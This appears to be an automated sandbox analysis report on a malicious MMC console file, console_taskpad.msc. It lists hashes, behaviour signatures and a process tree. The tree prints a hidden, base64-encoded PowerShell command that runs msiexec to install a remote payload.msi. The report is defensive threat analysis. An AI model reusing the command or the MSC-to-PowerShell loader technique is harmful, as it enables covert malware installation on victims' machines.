Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05-09-2024 12:29
Static task
static1
Behavioral task
behavioral1
Sample
console_taskpad.msc
Resource
win7-20240903-en
windows7-x64
9 signatures
150 seconds
Behavioral task
behavioral2
Sample
console_taskpad.msc
Resource
win10v2004-20240802-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
console_taskpad.msc
-
Size
89KB
-
MD5
2eb6d269b47a185ee8f7b01a9119f3b9
-
SHA1
1563289aa3f9561c72982500192e6d64c1c54d33
-
SHA256
690a71fe18b9191bebfcfedeb4873b49d6601df9ba25e3bf13b3b00783cc474c
-
SHA512
16beb9a1ad5f498cd99c5470047ce7ffee0affac28d921a4b948e296f853d32ca77ce1091fb3bf052e58bc7a7f5886752788159136b4067a7e4fbb601c0096cb
-
SSDEEP
384:TOA5bzsRKLRkJ/6ke1Wt7qGWtqykfqrV6Ekh:6gbwVgWTUV6Ekh
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2760 powershell.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 2896 msiexec.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mmc.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch mmc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" mmc.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2760 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2056 mmc.exe 2896 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: 33 2056 mmc.exe Token: SeIncBasePriorityPrivilege 2056 mmc.exe Token: 33 2056 mmc.exe Token: SeIncBasePriorityPrivilege 2056 mmc.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeShutdownPrivilege 2896 msiexec.exe Token: SeIncreaseQuotaPrivilege 2896 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2896 msiexec.exe 2896 msiexec.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2056 mmc.exe 2056 mmc.exe 2056 mmc.exe 2056 mmc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2056 wrote to memory of 2760 2056 mmc.exe 31 PID 2056 wrote to memory of 2760 2056 mmc.exe 31 PID 2056 wrote to memory of 2760 2056 mmc.exe 31 PID 2760 wrote to memory of 2896 2760 powershell.exe 33 PID 2760 wrote to memory of 2896 2760 powershell.exe 33 PID 2760 wrote to memory of 2896 2760 powershell.exe 33 PID 2760 wrote to memory of 2896 2760 powershell.exe 33 PID 2760 wrote to memory of 2896 2760 powershell.exe 33
Processes
-
C:\Windows\system32\mmc.exeC:\Windows\system32\mmc.exe "C:\Users\Admin\AppData\Local\Temp\console_taskpad.msc"1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -encodedCommand bQBzAGkAZQB4AGUAYwAgAC0AaQAgAGgAdAB0AHAAOgBcAFwAXABcAGwAbwBjAGEAbABoAG8AcwB0AFwAXABwAGEAeQBsAG8AYQBkAC4AbQBzAGkA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" -i http:\\\\localhost\\payload.msi3⤵
- Event Triggered Execution: Installer Packages
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2896
-
-